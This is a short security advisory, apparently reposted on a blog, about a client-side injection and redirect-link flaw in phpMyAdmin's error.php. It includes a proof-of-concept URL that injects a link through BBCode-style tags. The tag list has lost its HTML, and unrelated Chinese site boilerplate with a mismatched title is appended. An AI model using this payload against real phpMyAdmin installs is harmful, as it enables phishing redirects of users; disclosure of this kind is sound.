PhpMyAdmin Client Side 0Day Code Injection and Redirect Link Falsification
Credits:
Emanuele ’emgent’ Gentili
Marco ‘white_sheep’ Rondini
Alessandro ‘scox’ Scoscia
In error.php, PhpMyAdmin permit to insert text and restricted tag, like BBCode.
With tag [a@url@page]Click Me[/a], you can insert your own page, and redirect all users.
Available tags are:
‘[i]’ => ‘‘,
‘[/i]’ => ”,
‘[em]’ => ‘‘,
‘[/em]’ => ”,
‘[b]’ => ‘‘,
‘[/b]’ => ”,
‘[strong]’ => ‘‘,
‘[/strong]’ => ”,
‘[tt]’ => ‘',
‘[/tt]’ => ”,
‘[code]’ => ‘',
‘[/code]’ => ”,
‘[kbd]’ => ‘',
‘[/kbd]’ => ”,
‘[br]’ => ‘
‘,
‘[/a]’ => ”,
‘[sup]’ => ‘‘,
‘[/sup]’ => ”,
and replace ‘/\[a@([^”@]*)@([^]”]*)\]/’ with ‘‘
POC:
http://127.0.0.1/phpmyadmin/error.php?type=This+is+a+client+side+hole+evidence&error=Client+side+attack+via+characters+injection[br]It%27s+possible+use+some+special+tags+too[br]Found+by+Tiger+Security+Tiger+Team+-+[a%40http://www.tigersecurity.it%40_self]This%20Is%20a%20Link[%2Fa]
OWASP Reference:
http://www.owasp.org/index.php/Unvalidated_Input
今天的文章
php和MySQL做一个登录界面_php和MySQL做一个登录界面分享到此就结束了,感谢您的阅读。
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
如需转载请保留出处:https://bianchenghao.cn/60267.html
